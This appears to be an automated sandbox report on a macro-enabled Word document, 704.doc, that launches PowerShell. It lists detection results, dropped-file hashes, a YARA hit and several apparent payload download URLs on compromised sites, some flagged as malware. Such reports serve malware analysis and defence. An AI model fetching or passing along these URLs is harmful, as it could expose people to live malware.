Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Obfuscated Files or Information (1) | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

Behavior Graph


Screenshots


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label | Link
704.doc | 100% | Joe Sandbox ML | |

Dropped Files

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\~DF59F33552EDE7EF7C.TMP | 100% | Joe Sandbox ML | |

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label | Link
http://huskysb.com/wordpress/6f0qIQ | 0% | Avira URL Cloud | safe |
http://huskysb.com/wordpre | 0% | Avira URL Cloud | safe |
http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/PE | 0% | Avira URL Cloud | safe |
http://ckfoods.net/wp-admin/wPInm2rgMu/ | 100% | Avira URL Cloud | malware |
http://primtalent.com/wp-admin/9yt1u/ | 0% | Avira URL Cloud | safe |
http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/ | 0% | Avira URL Cloud | safe |
http://huskysb.com/wordpress/6f0qIQlWPaYDfa/ | 0% | Avira URL Cloud | safe |
http://adorwelding.zmo | 0% | Avira URL Cloud | safe |
http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/ | 0% | Avira URL Cloud | safe |
http://server.zmotpro.com/venkat/ | 0% | Avira URL Cloud | safe |
http://adorwelding.zmotp | 0% | Avira URL Cloud | safe |
http://manak.edunetf | 0% | Avira URL Cloud | safe |
http://www.%s.comPA | 0% | URL Reputation | safe |
http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/ | 100% | Avira URL Cloud | malware |
http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/ | 100% | Avira URL Cloud | malware |
http://primtalent.com/wp-admin/9 | 0% | Avira URL Cloud | safe |
http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/P | 0% | Avira URL Cloud | safe |
http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBW | 0% | Avira URL Cloud | safe |
http://ckfoods.net/wp-admin/wP | 0% | Avira URL Cloud | safe |

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://huskysb.com/wordpress/6f0qIQ | powershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://huskysb.com/wordpre | powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | powershell.exe, 00000004.00000002.435087637.00000000024B0000.00000002.00020000.sdmp | false | | high
http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/PE | powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://ckfoods.net/wp-admin/wPInm2rgMu/ | powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp | true | Avira URL Cloud: malware | unknown
http://primtalent.com/wp-admin/9yt1u/ | powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp | true | Avira URL Cloud: safe | unknown
http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/ | powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp | true | Avira URL Cloud: safe | unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | powershell.exe, 00000004.00000002.434822089.00000000002D0000.00000004.00000020.sdmp | false | | high
http://huskysb.com/wordpress/6f0qIQlWPaYDfa/ | powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp | true | Avira URL Cloud: safe | unknown
http://adorwelding.zmo | powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/ | powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp | true | Avira URL Cloud: safe | unknown
http://server.zmotpro.com/venkat/ | powershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://adorwelding.zmotp | powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://manak.edunetf | powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://www.%s.comPA | powershell.exe, 00000004.00000002.435087637.00000000024B0000.00000002.00020000.sdmp | false | URL Reputation: safe | low
http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/ | powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp | true | Avira URL Cloud: malware | unknown
http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/ | powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp | true | Avira URL Cloud: malware | unknown
http://primtalent.com/wp-admin/9 | powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/P | powershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBW | powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://ckfoods.net/wp-admin/wP | powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown

      Contacted IPs

      No contacted IP infos

      General Information

      Joe Sandbox Version:34.0.0 Boulder Opal
      Analysis ID:526268
      Start date:22.11.2021
      Start time:13:15:10
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 5m 31s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:704.doc
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:6
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • GSI enabled (VBA)
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal92.expl.evad.winDOC@5/13@0/0
      EGA Information:Failed
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 1
      • Number of non-executed functions: 1
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .doc
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
• Execution Graph export aborted for target powershell.exe, PID 2776 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtSetInformationFile calls found.

      Simulations

      Behavior and APIs

Time | Type | Description
13:15:25 | API Interceptor | 64x Sleep call for process: powershell.exe modified

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7F744DDE.png
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:PNG image data, 1127 x 490, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):121507
      Entropy (8bit):7.978393301250379
      Encrypted:false
      SSDEEP:3072:oXwhJd0+y7ukYe4uYum1GdgOpVXGuhCUqc:oXw50+OukzVXV2uhDj
      MD5:D3C11BC087FAF4372F4C5D37E06FCFFD
      SHA1:40A9FE4D47DADFDB1463D63F14D6D60641AC19E5
      SHA-256:6F49F13CEF0667A75A3E55767CD769F476EB3FF400BDA8CB3FBF47BA8B0A7077
      SHA-512:C50363E3CA99B4537A8BA625D84CD0A8C2E8FB15D1FF0163E967D3536E373F3449EB4489EC117766D78B1386D60192453FAE8C372119E32D98E58B07844216EB
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: .PNG........IHDR...g.........&.......sRGB.........IDATx^..`....^..K.,[.w..tB..Hh.B......B.IH.4z3....1.\q..z?..m...=.d.P....".........7...]g..!I...`.o.@.. .D...."@.... .D`.%`.......]......T.1.4.A..@8.|....."@.... .D...."...0...".'.CS...7.......jn..TM..~(..!........."@.... .D....".....0.C.$..y.....(^..IK.z...VM.&...G:.) .AV5v...!...`.."H.`.....C.'.%.3w--..>.I..."@.... .D...."..#..R.d..&L[3...5.zj.{/...5..u.C...; .P,.xY.T.4%=...!:$.)..)..#..[>..F.zD.... .D...."@........D.k.0v......t3..w..66.+.d........+....K.....G.=,H.Ur..x..2E. ...O"...:.g.Le...;...O..qw....n...$*...."@.... .D.....J #B.|M.qS.M<..5......j.e.O.!vL.qa.)*D.$).d.."...v..{....:..,.vy.._.k...:#...&........2.p>^,.g.b...a7....C...N....+..ke.g&#.r...Q)D...."@.... .D...+..U.....'.f..P5..=[#q.a.G...W.VF.Y.e..e=.km......]2.7rh.C..u...d.Ru..;c.;.V....*..:^]..5CQ.W....&..$..|.J2.....V4{.U..i....py.t.....,.....+..U.r+..0..R\.s....NB..$#.....~....R".....k..{.... .D....".W.dD.q.1m..-......E4<t..}
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:Composite Document File V2 Document, Cannot read section info
      Category:dropped
      Size (bytes):41984
      Entropy (8bit):5.396502435833668
      Encrypted:false
      SSDEEP:768:QoV2gfCYtBMnkyXpua8HfxV2gfCgtBMnkyXpua8H:Y6N7MkVhHG6B7MkVhH
      MD5:CE9E5A2954866976632E497655B1882B
      SHA1:D1518E3C3269FD2E6512D6045A463CBE09211E99
      SHA-256:75A2A12D357329BB6C6CAC8730CDA50728B0A37B53DEE4D585F00F235607E45E
      SHA-512:19E743670CB5B16DEE433A19EB0EBD9A31D6D36C28AF9C5944C1CD8645EF278CF07F3812B674415D67EAB4DAEAB71F0F442E63D4631E9472614F66AE2C02C144
      Malicious:false
      Reputation:low
      Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................(...*...........................................................................................................................................)...+...6...O...........................................,...................................................................................................P...........................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{58F32F91-EE55-4449-B0B3-F02D5B2E95D2}.tmp
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):1024
      Entropy (8bit):0.05390218305374581
      Encrypted:false
      SSDEEP:3:ol3lYdn:4Wn
      MD5:5D4D94EE7E06BBB0AF9584119797B23A
      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
      Malicious:false
      Reputation:high, very likely benign file
      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8907FAB7-1F61-4790-AB28-47403D75A993}.tmp
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):2
      Entropy (8bit):1.0
      Encrypted:false
      SSDEEP:3:X:X
      MD5:32649384730B2D61C9E79D46DE589115
      SHA1:053D8D6CEEBA9453C97D0EE5374DB863E6F77AD4
      SHA-256:E545D395BB3FD971F91BF9A2B6722831DF704EFAE6C1AA9DA0989ED0970B77BB
      SHA-512:A4944ADFCB670ECD1A320FF126E7DBC7FC8CC4D5E73696D43C404E1C9BB5F228CF8A6EC1E9B1820709AD6D4D28093B7020B1B2578FDBC764287F86F888C07D9C
      Malicious:false
      Reputation:high, very likely benign file
      Preview: ..
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EB899D35-EEB1-4849-9BF6-6658C3435874}.tmp
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):1536
      Entropy (8bit):3.1478370528780375
      Encrypted:false
      SSDEEP:24:HfCemjup6uKTHuJPkTQXaHINvhSBxD+aoF:TKTOJuymfO
      MD5:582FA24D082E9486E72A1B9681CDF97B
      SHA1:CB23EE4B0A2D6188A7C39562DB5B4AA8A9C4FBB9
      SHA-256:F857A260E9DC18D6B5A51207FAC4F1A8A985840E8132CCFB324DEAC36DF67145
      SHA-512:48BDDEC49E6DDE25F4BC3D28C2A8D33E7382022226DF0A836044EB1A3E69FA5A46712AE301BF478C23F686297EB5E9BD9AE2C7A29F03628706CE69BA9E08EDCA
      Malicious:false
      Reputation:low
      Preview: ../... ... . ... ... ..... . ... ... . ..... . ....... ... ..... ......... . . ... . ... ... . . ............. . ....... ... ............... ... ......... ......... . . ....... . ..... . . ... ... ... . .....................................................................................................................................................................................................................................................................................................................................@...H...\...f...h...|................................................................................................................................................................................................................................................................................................................................................L.......\. ............gd|b..........).Y...gd..T.............gd|H...............L.......\. ............gd..T.......
      C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):147284
      Entropy (8bit):4.421579591711272
      Encrypted:false
      SSDEEP:1536:C8HL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcmB:CkJNSc83tKBAvQVCgOtmXmLpLmB
      MD5:4E827FA2947FDADD8926FF58D42BC7E9
      SHA1:65C90AB768A1D7FBABB6F1C719110DA6FD5D9B12
      SHA-256:5CD589A641061016C526FCB4220895E8A323BB7DCC27FC6C540A9BA594A7750B
      SHA-512:3D23844999CC2DC772141B7071760A318495D9008B929229F6BDC7CDFC3AFD2B532FD39863BBAFA122C566B908E0917A7DCA0AD5D063BAE9FDDFCB1BDB2F9653
      Malicious:false
      Reputation:low
      Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8...........N..............\W...............J..............,<...............<..............xW..............xY..xG.............T...........D...............................T...............................................................&!..d...........................................................................................
      C:\Users\user\AppData\Local\Temp\~DF59F33552EDE7EF7C.TMP
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:Composite Document File V2 Document, Cannot read section info
      Category:dropped
      Size (bytes):57856
      Entropy (8bit):4.701644950261556
      Encrypted:false
      SSDEEP:768:gkvd/MFp4Zgj+KmkyGhAQhQw4vwQAYYyWWwgekrrozS6X+W:HM/j1xXhQmkrrozS6OW
      MD5:3AD53E44E66D3E083F7DF8F643C4CA3E
      SHA1:44B4AB308D072BADDFD8C7138508F11A4FB0F9BF
      SHA-256:1CE1F8D3E16D8DB7F0B001101283CD500B3DC59073AD01400D18E6BF4F6AFCFA
      SHA-512:480174C894799065B0F1C86A1CCE51BAAE26951667DF232FFE399A7B761D0022C4DF8620D08B32C3EDF18806F2E56D8E96081E3D762235BF9092A953E03ACB53
      Malicious:true
      Yara Hits:
      • Rule: SUSP_VBA_FileSystem_Access, Description: Detects suspicious VBA that writes to disk and is activated on document open, Source: C:\Users\user\AppData\Local\Temp\~DF59F33552EDE7EF7C.TMP, Author: Florian Roth
      Antivirus:
      • Antivirus: Joe Sandbox ML, Detection: 100%
      Preview: ......................>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................J....................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7.......9...:...;...<...=...F...?...@...A...B...C...D...E...8...G...H...I.......l...L...M...N...S...P...Q...R.......m...]...V...W...X...Y...Z...[...\...O...^..._...`...a...j...c...d...e...f...g...h...i...T...k...........n...o...............................................
      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\704.LNK
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:59 2021, mtime=Mon Aug 30 20:08:59 2021, atime=Mon Nov 22 20:15:18 2021, length=136531, window=hide
      Category:dropped
      Size (bytes):973
      Entropy (8bit):4.501036887264172
      Encrypted:false
      SSDEEP:12:8n2wfq0gXg/XAlCPCHaXvB4XB/a/X+W6Dp2nEicvbIX8vs5DtZ3YilMMEpxRljKN:8HP/XT/4Imp2nveE0s5Dv3q3Qd7Qy
      MD5:0014D6DE553BD69E527052AF58AC3A74
      SHA1:B61ADCFD29FD6F5BE647FAB62F82B4D2B319C22D
      SHA-256:CC1F9F876CB4A4CF9838CE5FB0B9DF6ED8F1A16A2AB387694CD5CA1DC52A714B
      SHA-512:6FD6626E49D1D9B86B20CB21C1D024FB79E4C0C1ED9E3E688A6F63B0EA235C15BAAB38E6E46D7A3DB24BB7570B3DEBF8BDE5A78DF3D1316DDB250609384F563F
      Malicious:false
      Preview: L..................F.... .....U@.....U@....Y&.....S............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S!...user.8......QK.X.S!.*...&=....U...............A.l.b.u.s.....z.1......S"...Desktop.d......QK.X.S".*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....R.2.S...vS. .704.doc.<.......S ..S .*.........................7.0.4...d.o.c.......q...............-...8...[............?J......C:\Users\..#...................\\414408\Users.user\Desktop\704.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.7.0.4...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......414408..........D_....3N...W...9..g............[D_....3N...W...9..g............[....
      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):57
      Entropy (8bit):4.440640076685947
      Encrypted:false
      SSDEEP:3:bDuMJl+VomX1SVtBVov:bCJaV9y
      MD5:2B1A3D4E9531BB7AAAEEE91097C6E6C8
      SHA1:CDCB8BB8DF9FDC8AE6C9B4E7B3FA485B8075C74B
      SHA-256:7C5B1F305E5CDABE223B67B449800F306C63D8B354CA4A21F1C8C20E909EC8E1
      SHA-512:B2ED8A04808A83A548F91A0CFA5B3D830A05EB52D6B4F436B02D3ADDF1A020DBE04252F19E778E706827A16CBB7E3ECED7BBD8E82E69096A1328E2BEFA478374
      Malicious:false
      Preview: [folders]..Templates.LNK=0..704.LNK=0..[doc]..704.LNK=0..
      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):162
      Entropy (8bit):2.5038355507075254
      Encrypted:false
      SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
      MD5:45B1E2B14BE6C1EFC217DCE28709F72D
      SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
      SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
      SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
      Malicious:false
      Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms. (copy)
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:dropped
      Size (bytes):8016
      Entropy (8bit):3.58293275849656
      Encrypted:false
      SSDEEP:96:chQCcMqGqvsqvJCwo5z8hQCcMqGqvsEHyqvJCworXzIyYDH6F2htlUVjA2:ci7o5z8ivHnorXzIoF2hCA2
      MD5:8F22547DE16012FD240D42D18B0C5959
      SHA1:0B61D0A635BC93922E916B17EC50B9360EB3B752
      SHA-256:7CD9D5910D7CD1976ABC501A7115AB590611E139043382C83574ADE07AF79921
      SHA-512:04229BA1E0EDEDD2D729F1E27D2222F30AB613CAAE2F196C547EFC6AE2C5F59BE15D9BCADBCFCEA45155FCEA89ED2EA99A22073A36EE0FDD4D05D0F842AF8415
      Malicious:false
      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J29WGVF1UDYP81V0IINR.temp
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:data
      Category:dropped
      Size (bytes):8016
      Entropy (8bit):3.58293275849656
      Encrypted:false
      SSDEEP:96:chQCcMqGqvsqvJCwo5z8hQCcMqGqvsEHyqvJCworXzIyYDH6F2htlUVjA2:ci7o5z8ivHnorXzIoF2hCA2
      MD5:8F22547DE16012FD240D42D18B0C5959
      SHA1:0B61D0A635BC93922E916B17EC50B9360EB3B752
      SHA-256:7CD9D5910D7CD1976ABC501A7115AB590611E139043382C83574ADE07AF79921
      SHA-512:04229BA1E0EDEDD2D729F1E27D2222F30AB613CAAE2F196C547EFC6AE2C5F59BE15D9BCADBCFCEA45155FCEA89ED2EA99A22073A36EE0FDD4D05D0F842AF8415
      Malicious:false
      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
      C:\Users\user\Desktop\~$704.doc
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):162
      Entropy (8bit):2.5038355507075254
      Encrypted:false
      SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
      MD5:45B1E2B14BE6C1EFC217DCE28709F72D
      SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
      SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
      SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
      Malicious:true
      Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

      Static File Info

      General

      File type:Microsoft Word 2007+
      Entropy (8bit):7.953888666040384
      TrID:
      • Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%
      • Word Microsoft Office Open XML Format document (49504/1) 32.35%
      • Word Microsoft Office Open XML Format document (43504/1) 28.43%
      • ZIP compressed archive (8000/1) 5.23%
      File name:704.doc
      File size:146367
      MD5:40f85d07da2533d576b1f2d7c043a2da
      SHA1:60b84d70a6511483c6de131fb62e30a99edff5c4
      SHA256:d05ec2a0134518ec74fcbee94a522c3837d82b7b5d2f162b8466850fc4f1be0d
      SHA512:fb718ea1a81fdcba7c933cd55a54beeee660a7e4d5b0a1e1ee11351e40cc691dd3fb644dce60335dfea9c983fc5a4ce079b2a3349fb26c77c444c66cada454a2
      SSDEEP:3072:hAGj2SXwhJd0+y7ukYe4uYum1GdgOpVXGuhCUqDve/Nk:9CSXw50+OukzVXV2uhDCG/Nk
      File Content Preview:PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................

      File Icon

      Icon Hash:e4eea2aaa4b4b4a4

      Static OLE Info

      General

      Document Type:OpenXML
      Number of OLE Files:1

      OLE File "/opt/package/joesandbox/database/analysis/526268/sample/704.doc"

      Indicators

      Has Summary Info:False
      Application Name:unknown
      Encrypted Document:False
      Contains Word Document Stream:
      Contains Workbook/Book Stream:
      Contains PowerPoint Document Stream:
      Contains Visio Document Stream:
      Contains ObjectPool Stream:
      Flash Objects Count:
      Contains VBA Macros:True

      Summary

      Author:1
      Template:Normal.dotm
      Last Saved By:1
      Revision Number:103
      Total Edit Time:211
      Create Time:2021-11-15T15:39:00Z
      Last Saved Time:2021-11-18T19:09:00Z
      Number of Pages:1
      Number of Words:16
      Number of Characters:95
      Creating Application:Microsoft Office Word
      Security:0

      Document Summary

      Number of Lines:1
      Number of Paragraphs:1
      Thumbnail Scaling Desired:false
      Company:
      Contains Dirty Links:false
      Shared Document:false
      Changed Hyperlinks:false
      Application Version:12.0000

      Streams with VBA

      VBA File Name: cvbku3gakuisdgfilu3gblaw.cls, Stream Size: 10382
      General
      Stream Path:VBA/cvbku3gakuisdgfilu3gblaw
      VBA File Name:cvbku3gakuisdgfilu3gblaw.cls
      Stream Size:10382
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ? . . . . . . . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 01 00 00 f0 00 00 00 9e 08 00 00 d4 00 00 00 02 02 00 00 ff ff ff ff a7 08 00 00 3f 1b 00 00 00 00 00 00 01 00 00 00 ea eb ff 49 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code
      Attribute VB_Name = "cvbku3gakuisdgfilu3gblaw"
      Attribute VB_Base = "1Normal.ThisDocument"
      Attribute VB_GlobalNameSpace = False
      Attribute VB_Creatable = False
      Attribute VB_PredeclaredId = True
